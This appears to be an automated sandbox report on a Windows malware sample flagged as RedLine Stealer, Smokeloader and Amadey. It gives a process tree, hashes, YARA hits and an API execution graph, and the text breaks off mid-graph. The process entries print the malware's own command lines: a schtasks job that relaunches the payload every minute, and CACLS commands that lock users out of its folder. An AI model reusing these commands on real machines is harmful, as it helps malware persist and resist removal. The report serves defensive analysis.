                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.414193208.00000000005F7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.390341867.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000003.390341867.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 39%, ReversingLabs
                                                        Reputation:low

                                                        Target ID:3
                                                        Start time:14:15:36
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\System32\rundll32.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                        Imagebase:0x7ff73f890000
                                                        File size:69632 bytes
                                                        MD5 hash:73C519F050C20580F8A62C849D49215A
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:4
                                                        Start time:14:15:48
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\System32\rundll32.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                        Imagebase:0x7ff73f890000
                                                        File size:69632 bytes
                                                        MD5 hash:73C519F050C20580F8A62C849D49215A
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:7
                                                        Start time:14:16:12
                                                        Start date:06/02/2023
                                                        Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                        Imagebase:0x790000
                                                        File size:11264 bytes
                                                        MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 82%, ReversingLabs
                                                        Reputation:moderate

                                                        Target ID:8
                                                        Start time:14:16:25
                                                        Start date:06/02/2023
                                                        Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                        Imagebase:0x170000
                                                        File size:241664 bytes
                                                        MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000000.443338469.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 81%, ReversingLabs
                                                        Reputation:moderate

                                                        Target ID:9
                                                        Start time:14:16:26
                                                        Start date:06/02/2023
                                                        Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                                                        Imagebase:0xd80000
                                                        File size:241664 bytes
                                                        MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000002.827863468.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.827977648.0000000000D81000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000002.827863468.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000000.445122215.0000000000D81000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000003.581791427.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000002.827863468.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000003.581742963.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000003.581742963.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000009.00000002.827863468.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 81%, ReversingLabs
                                                        Reputation:moderate

                                                        Target ID:10
                                                        Start time:14:16:27
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                                                        Imagebase:0x1020000
                                                        File size:185856 bytes
                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:11
                                                        Start time:14:16:27
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7fcd70000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:12
                                                        Start time:14:16:27
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                                                        Imagebase:0x11d0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:13
                                                        Start time:14:16:27
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7fcd70000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:14
                                                        Start time:14:16:27
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                        Imagebase:0x11d0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:15
                                                        Start time:14:16:27
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\cacls.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:CACLS "mnolyk.exe" /P "user:N"
                                                        Imagebase:0xe90000
                                                        File size:27648 bytes
                                                        MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:16
                                                        Start time:14:16:27
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\cacls.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:CACLS "mnolyk.exe" /P "user:R" /E
                                                        Imagebase:0xe90000
                                                        File size:27648 bytes
                                                        MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:17
                                                        Start time:14:16:28
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                        Imagebase:0x11d0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:18
                                                        Start time:14:16:28
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\cacls.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:CACLS "..\4b9a106e76" /P "user:N"
                                                        Imagebase:0xe90000
                                                        File size:27648 bytes
                                                        MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:19
                                                        Start time:14:16:28
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\cacls.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:CACLS "..\4b9a106e76" /P "user:R" /E
                                                        Imagebase:0xe90000
                                                        File size:27648 bytes
                                                        MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:20
                                                        Start time:14:16:29
                                                        Start date:06/02/2023
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                        Imagebase:0x1290000
                                                        File size:61952 bytes
                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:21
                                                        Start time:14:16:29
                                                        Start date:06/02/2023
                                                        Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Imagebase:0xd80000
                                                        File size:241664 bytes
                                                        MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.452140965.0000000000D81000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000000.451650195.0000000000D81000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:26.5%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:26.9%
                                                          Total number of Nodes:966
                                                          Total number of Limit Nodes:40
                                                          execution_graph 2196 10c6f40 SetUnhandledExceptionFilter 2197 10c4cc0 GlobalFree 3122 10c4200 3123 10c421e 3122->3123 3124 10c420b SendMessageA 3122->3124 3124->3123 3125 10c3100 3126 10c31b0 3125->3126 3127 10c3111 3125->3127 3128 10c31b9 SendDlgItemMessageA 3126->3128 3133 10c3141 3126->3133 3129 10c3149 GetDesktopWindow 3127->3129 3132 10c311d 3127->3132 3128->3133 3135 10c43d0 6 API calls 3129->3135 3130 10c3138 EndDialog 3130->3133 3132->3130 3132->3133 3137 10c4463 SetWindowPos 3135->3137 3138 10c6ce0 4 API calls 3137->3138 3139 10c315d 6 API calls 3138->3139 3139->3133 3140 10c4bc0 3142 10c4c05 3140->3142 3143 10c4bd7 3140->3143 3141 10c4c1b SetFilePointer 3141->3143 3142->3141 3142->3143 3144 10c30c0 3145 10c30de CallWindowProcA 3144->3145 3146 10c30ce 3144->3146 3147 10c30da 3145->3147 3146->3145 3146->3147 3148 10c63c0 3149 10c6407 3148->3149 3150 10c658a CharPrevA 3149->3150 3151 10c6415 CreateFileA 3150->3151 3152 10c6448 WriteFile 3151->3152 3153 10c643a 3151->3153 3154 10c6465 CloseHandle 3152->3154 3156 10c6ce0 4 API calls 3153->3156 3154->3153 3157 10c648f 3156->3157 3158 10c6c03 3159 10c6c1e 3158->3159 3160 10c6c17 _exit 3158->3160 3161 10c6c27 _cexit 3159->3161 3162 10c6c32 3159->3162 3160->3159 3161->3162 2198 10c4ad0 2206 10c3680 2198->2206 2201 10c4aee WriteFile 2203 10c4b0f 2201->2203 2204 10c4b14 2201->2204 2202 10c4ae9 2204->2203 2205 10c4b3b SendDlgItemMessageA 2204->2205 2205->2203 2207 10c3691 MsgWaitForMultipleObjects 2206->2207 2208 10c36e8 2207->2208 2209 10c36a9 PeekMessageA 2207->2209 2208->2201 2208->2202 2209->2207 2210 10c36bc 2209->2210 2210->2207 2210->2208 2211 10c36c7 DispatchMessageA 2210->2211 2212 10c36d1 PeekMessageA 2210->2212 2211->2212 2212->2210 2213 10c4cd0 2214 10c4d0b 2213->2214 2215 10c4cf4 2213->2215 2216 10c4d02 2214->2216 2219 10c4dcb 2214->2219 2222 10c4d25 2214->2222 2215->2216 2217 10c4b60 FindCloseChangeNotification 2215->2217 2270 10c6ce0 2216->2270 2217->2216 2220 10c4dd4 SetDlgItemTextA 2219->2220 2223 10c4de3 2219->2223 2220->2223 2221 10c4e95 2222->2216 2236 10c4c37 2222->2236 2223->2216 2244 10c476d 2223->2244 2227 10c4e38 2227->2216 2253 10c4980 2227->2253 2232 10c4e64 2261 10c47e0 LocalAlloc 2232->2261 2235 10c4e6f 2235->2216 2237 10c4c4c DosDateTimeToFileTime 2236->2237 2239 10c4c88 2236->2239 2238 10c4c5e LocalFileTimeToFileTime 2237->2238 2237->2239 2238->2239 2240 10c4c70 SetFileTime 2238->2240 2239->2216 2241 10c4b60 2239->2241 2240->2239 2242 10c4b76 SetFileAttributesA 2241->2242 2243 10c4b92 FindCloseChangeNotification 2241->2243 2242->2216 2243->2242 2275 10c66ae GetFileAttributesA 2244->2275 2247 10c477b 2247->2227 2248 10c47cc SetFileAttributesA 2249 10c47db 2248->2249 2249->2227 2252 10c47c2 2252->2248 2254 10c4990 2253->2254 2255 10c49a5 2254->2255 2256 10c49c2 lstrcmpA 2254->2256 2259 10c44b9 20 API calls 2255->2259 2257 10c4a0e 2256->2257 2258 10c49ba 2256->2258 2257->2258 2340 10c487a 2257->2340 2258->2216 2258->2232 2259->2258 2262 10c480f LocalAlloc 2261->2262 2263 10c47f6 2261->2263 2265 10c480b 2262->2265 2267 10c4831 2262->2267 2264 10c44b9 20 API calls 2263->2264 2264->2265 2265->2235 2268 10c44b9 20 API calls 2267->2268 2269 10c4846 LocalFree 2268->2269 2269->2265 2271 10c6ce8 2270->2271 2272 10c6ceb 2270->2272 2271->2221 2353 10c6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2272->2353 2274 10c6e26 2274->2221 2276 10c4777 2275->2276 2276->2247 2276->2248 2277 10c6517 FindResourceA 2276->2277 2278 10c656b 2277->2278 2279 10c6536 LoadResource 2277->2279 2284 10c44b9 2278->2284 2279->2278 2280 10c6544 DialogBoxIndirectParamA FreeResource 2279->2280 2280->2278 2282 10c47b1 2280->2282 2282->2248 2282->2249 2282->2252 2285 10c44fe LoadStringA 2284->2285 2286 10c455a 2284->2286 2287 10c4527 2285->2287 2288 10c4562 2285->2288 2290 10c6ce0 4 API calls 2286->2290 2313 10c681f 2287->2313 2294 10c45c9 2288->2294 2299 10c457e 2288->2299 2292 10c4689 2290->2292 2292->2282 2293 10c4536 MessageBoxA 2293->2286 2296 10c45cd LocalAlloc 2294->2296 2297 10c4607 LocalAlloc 2294->2297 2296->2286 2302 10c45f3 2296->2302 2297->2286 2309 10c45c4 2297->2309 2299->2299 2301 10c4596 LocalAlloc 2299->2301 2301->2286 2305 10c45af 2301->2305 2306 10c171e _vsnprintf 2302->2306 2303 10c462d MessageBeep 2304 10c681f 10 API calls 2303->2304 2307 10c463b 2304->2307 2330 10c171e 2305->2330 2306->2309 2310 10c67c9 EnumResourceLanguagesA 2307->2310 2312 10c4645 MessageBoxA LocalFree 2307->2312 2309->2303 2310->2312 2312->2286 2314 10c6857 GetVersionExA 2313->2314 2323 10c691a 2313->2323 2316 10c687c 2314->2316 2314->2323 2315 10c6ce0 4 API calls 2317 10c452c 2315->2317 2318 10c68a5 GetSystemMetrics 2316->2318 2316->2323 2317->2293 2324 10c67c9 2317->2324 2319 10c68b5 RegOpenKeyExA 2318->2319 2318->2323 2320 10c68d6 RegQueryValueExA RegCloseKey 2319->2320 2319->2323 2321 10c690c 2320->2321 2320->2323 2334 10c66f9 2321->2334 2323->2315 2325 10c6803 2324->2325 2326 10c67e2 2324->2326 2325->2293 2338 10c6793 EnumResourceLanguagesA 2326->2338 2328 10c67f5 2328->2325 2339 10c6793 EnumResourceLanguagesA 2328->2339 2331 10c172d 2330->2331 2332 10c173d _vsnprintf 2331->2332 2333 10c175d 2331->2333 2332->2333 2333->2309 2335 10c670f 2334->2335 2336 10c6740 CharNextA 2335->2336 2337 10c674b 2335->2337 2336->2335 2337->2323 2338->2328 2339->2325 2341 10c48a2 CreateFileA 2340->2341 2343 10c4908 2341->2343 2344 10c48e9 2341->2344 2343->2258 2344->2343 2345 10c48ee 2344->2345 2348 10c490c 2345->2348 2349 10c48f5 CreateFileA 2348->2349 2351 10c4917 2348->2351 2349->2343 2350 10c4962 CharNextA 2350->2351 2351->2349 2351->2350 2352 10c4953 CreateDirectoryA 2351->2352 2352->2350 2353->2274 3163 10c3210 3164 10c328e EndDialog 3163->3164 3165 10c3227 3163->3165 3180 10c3239 3164->3180 3166 10c3235 3165->3166 3167 10c33e2 GetDesktopWindow 3165->3167 3171 10c324c 3166->3171 3172 10c32dd GetDlgItemTextA 3166->3172 3166->3180 3169 10c43d0 11 API calls 3167->3169 3170 10c33f1 SetWindowTextA SendDlgItemMessageA 3169->3170 3173 10c341f GetDlgItem EnableWindow 3170->3173 3170->3180 3174 10c32c5 EndDialog 3171->3174 3175 10c3251 3171->3175 3181 10c32fc 3172->3181 3196 10c3366 3172->3196 3173->3180 3174->3180 3176 10c325c LoadStringA 3175->3176 3175->3180 3177 10c327b 3176->3177 3178 10c3294 3176->3178 3184 10c44b9 20 API calls 3177->3184 3201 10c4224 LoadLibraryA 3178->3201 3179 10c44b9 20 API calls 3179->3180 3183 10c3331 GetFileAttributesA 3181->3183 3181->3196 3186 10c337c 3183->3186 3187 10c333f 3183->3187 3184->3164 3189 10c658a CharPrevA 3186->3189 3190 10c44b9 20 API calls 3187->3190 3188 10c32a5 SetDlgItemTextA 3188->3177 3188->3180 3191 10c338d 3189->3191 3192 10c3351 3190->3192 3193 10c58c8 27 API calls 3191->3193 3192->3180 3194 10c335a CreateDirectoryA 3192->3194 3195 10c3394 3193->3195 3194->3186 3194->3196 3195->3196 3197 10c33a4 3195->3197 3196->3179 3198 10c33c7 EndDialog 3197->3198 3199 10c597d 34 API calls 3197->3199 3198->3180 3200 10c33c3 3199->3200 3200->3180 3200->3198 3202 10c4246 GetProcAddress 3201->3202 3203 10c43b2 3201->3203 3204 10c425d GetProcAddress 3202->3204 3205 10c43a4 FreeLibrary 3202->3205 3207 10c44b9 20 API calls 3203->3207 3204->3205 3206 10c4274 GetProcAddress 3204->3206 3205->3203 3206->3205 3208 10c428b 3206->3208 3210 10c329d 3207->3210 3209 10c4295 GetTempPathA 3208->3209 3215 10c42e1 3208->3215 3211 10c42ad 3209->3211 3210->3180 3210->3188 3211->3211 3212 10c42b4 CharPrevA 3211->3212 3213 10c42d0 CharPrevA 3212->3213 3212->3215 3213->3215 3214 10c4390 FreeLibrary 3214->3210 3215->3214 3216 10c4a50 3217 10c4a9f ReadFile 3216->3217 3218 10c4a66 3216->3218 3219 10c4abb 3217->3219 3218->3219 3220 10c4a82 memcpy 3218->3220 3220->3219 3221 10c3450 3222 10c345e 3221->3222 3223 10c34d3 EndDialog 3221->3223 3224 10c349a GetDesktopWindow 3222->3224 3227 10c3465 3222->3227 3226 10c346a 3223->3226 3225 10c43d0 11 API calls 3224->3225 3228 10c34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3225->3228 3227->3226 3229 10c348c EndDialog 3227->3229 3228->3226 3229->3226 3230 10c6bef _XcptFilter 2354 10c4ca0 GlobalAlloc 2355 10c6a60 2356 10c6a65 2355->2356 2357 10c6a76 GetStartupInfoW 2356->2357 2358 10c6a93 2357->2358 2359 10c6aa8 2358->2359 2360 10c6aaf Sleep 2358->2360 2361 10c6ac7 _amsg_exit 2359->2361 2363 10c6ad1 2359->2363 2360->2358 2361->2363 2362 10c6b13 _initterm 2367 10c6b2e __IsNonwritableInCurrentImage 2362->2367 2363->2362 2364 10c6af4 2363->2364 2363->2367 2365 10c6bd6 _ismbblead 2365->2367 2366 10c6c1e 2366->2364 2368 10c6c27 _cexit 2366->2368 2367->2365 2367->2366 2370 10c6bbe exit 2367->2370 2371 10c2bfb GetVersion 2367->2371 2368->2364 2370->2367 2372 10c2c0f 2371->2372 2373 10c2c50 2371->2373 2372->2373 2375 10c2c13 GetModuleHandleW 2372->2375 2388 10c2caa memset memset memset 2373->2388 2375->2373 2377 10c2c22 GetProcAddress 2375->2377 2377->2373 2383 10c2c34 2377->2383 2378 10c2c8e 2380 10c2c9e 2378->2380 2381 10c2c97 CloseHandle 2378->2381 2380->2367 2381->2380 2383->2373 2386 10c2c89 2483 10c1f90 2386->2483 2500 10c468f FindResourceA SizeofResource 2388->2500 2391 10c2e30 2394 10c44b9 20 API calls 2391->2394 2392 10c2d2d CreateEventA SetEvent 2393 10c468f 7 API calls 2392->2393 2395 10c2d57 2393->2395 2396 10c2f06 2394->2396 2397 10c2d7d 2395->2397 2398 10c2d5b 2395->2398 2401 10c6ce0 4 API calls 2396->2401 2400 10c2e1f 2397->2400 2404 10c468f 7 API calls 2397->2404 2399 10c44b9 20 API calls 2398->2399 2402 10c2d6e 2399->2402 2505 10c5c9e 2400->2505 2405 10c2c62 2401->2405 2402->2396 2407 10c2d9f 2404->2407 2405->2378 2429 10c2f1d 2405->2429 2407->2398 2409 10c2da3 CreateMutexA 2407->2409 2408 10c2e3a 2410 10c2e52 FindResourceA 2408->2410 2411 10c2e43 2408->2411 2409->2400 2412 10c2dbd GetLastError 2409->2412 2415 10c2e6e 2410->2415 2416 10c2e64 LoadResource 2410->2416 2531 10c2390 2411->2531 2412->2400 2414 10c2dca 2412->2414 2417 10c2dea 2414->2417 2418 10c2dd5 2414->2418 2415->2402 2546 10c36ee GetVersionExA 2415->2546 2416->2415 2419 10c44b9 20 API calls 2417->2419 2420 10c44b9 20 API calls 2418->2420 2421 10c2dff 2419->2421 2423 10c2de8 2420->2423 2421->2400 2424 10c2e04 CloseHandle 2421->2424 2423->2424 2424->2396 2428 10c6517 24 API calls 2428->2402 2430 10c2f6c 2429->2430 2431 10c2f3f 2429->2431 2655 10c5164 2430->2655 2432 10c2f5f 2431->2432 2635 10c51e5 2431->2635 2788 10c3a3f 2432->2788 2436 10c2f71 2439 10c3041 2436->2439 2670 10c55a0 2436->2670 2441 10c6ce0 4 API calls 2439->2441 2443 10c2c6b 2441->2443 2470 10c52b6 2443->2470 2444 10c2f86 GetSystemDirectoryA 2445 10c658a CharPrevA 2444->2445 2446 10c2fab LoadLibraryA 2445->2446 2447 10c2ff7 FreeLibrary 2446->2447 2448 10c2fc0 GetProcAddress 2446->2448 2450 10c3006 2447->2450 2451 10c3017 SetCurrentDirectoryA 2447->2451 2448->2447 2449 10c2fd6 DecryptFileA 2448->2449 2449->2447 2458 10c2ff0 2449->2458 2450->2451 2720 10c621e GetWindowsDirectoryA 2450->2720 2452 10c3054 2451->2452 2453 10c3026 2451->2453 2455 10c3061 2452->2455 2731 10c3b26 2452->2731 2457 10c44b9 20 API calls 2453->2457 2455->2439 2460 10c307a 2455->2460 2740 10c256d 2455->2740 2462 10c3037 2457->2462 2458->2447 2464 10c3098 2460->2464 2751 10c3ba2 2460->2751 2807 10c6285 GetLastError 2462->2807 2464->2439 2468 10c30af 2464->2468 2809 10c4169 2468->2809 2471 10c52d6 2470->2471 2480 10c5316 2470->2480 2474 10c5300 LocalFree LocalFree 2471->2474 2476 10c52eb SetFileAttributesA DeleteFileA 2471->2476 2472 10c5374 2473 10c538c 2472->2473 3118 10c1fe1 2472->3118 2475 10c6ce0 4 API calls 2473->2475 2474->2471 2474->2480 2478 10c2c72 2475->2478 2476->2474 2478->2378 2478->2386 2479 10c535e SetCurrentDirectoryA 2482 10c2390 13 API calls 2479->2482 2480->2472 2480->2479 2481 10c65e8 4 API calls 2480->2481 2481->2479 2482->2472 2484 10c1f9a 2483->2484 2485 10c1f9f 2483->2485 2486 10c1ea7 15 API calls 2484->2486 2487 10c1fc0 2485->2487 2490 10c44b9 20 API calls 2485->2490 2491 10c1fd9 2485->2491 2486->2485 2488 10c1fcf ExitWindowsEx 2487->2488 2489 10c1ee2 GetCurrentProcess OpenProcessToken 2487->2489 2487->2491 2488->2491 2493 10c1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2489->2493 2496 10c1f0e 2489->2496 2490->2487 2491->2378 2494 10c1f6b ExitWindowsEx 2493->2494 2493->2496 2495 10c1f1f 2494->2495 2494->2496 2498 10c6ce0 4 API calls 2495->2498 2497 10c44b9 20 API calls 2496->2497 2497->2495 2499 10c1f8c 2498->2499 2499->2378 2501 10c46b6 2500->2501 2503 10c2d1a 2500->2503 2502 10c46be FindResourceA LoadResource LockResource 2501->2502 2501->2503 2502->2503 2504 10c46df memcpy_s FreeResource 2502->2504 2503->2391 2503->2392 2504->2503 2511 10c5e17 2505->2511 2514 10c5cc3 2505->2514 2506 10c6ce0 4 API calls 2508 10c2e2c 2506->2508 2507 10c5dd0 2510 10c5dec GetModuleFileNameA 2507->2510 2507->2511 2508->2391 2508->2408 2509 10c5ced CharNextA 2509->2514 2510->2511 2512 10c5e0a 2510->2512 2511->2506 2581 10c66c8 2512->2581 2514->2507 2514->2509 2514->2511 2515 10c6218 2514->2515 2518 10c5e36 CharUpperA 2514->2518 2524 10c5f9f CharUpperA 2514->2524 2525 10c5f59 CompareStringA 2514->2525 2526 10c6003 CharUpperA 2514->2526 2527 10c5edc CharUpperA 2514->2527 2528 10c60a2 CharUpperA 2514->2528 2529 10c667f IsDBCSLeadByte CharNextA 2514->2529 2586 10c658a 2514->2586 2590 10c6e2a 2515->2590 2518->2514 2519 10c61d0 2518->2519 2520 10c44b9 20 API calls 2519->2520 2521 10c61e7 2520->2521 2522 10c61f7 ExitProcess 2521->2522 2523 10c61f0 CloseHandle 2521->2523 2523->2522 2524->2514 2525->2514 2526->2514 2527->2514 2528->2514 2529->2514 2532 10c24cb 2531->2532 2535 10c23b9 2531->2535 2533 10c6ce0 4 API calls 2532->2533 2534 10c24dc 2533->2534 2534->2402 2535->2532 2536 10c23e9 FindFirstFileA 2535->2536 2536->2532 2544 10c2407 2536->2544 2537 10c2479 2541 10c2488 SetFileAttributesA DeleteFileA 2537->2541 2538 10c2421 lstrcmpA 2539 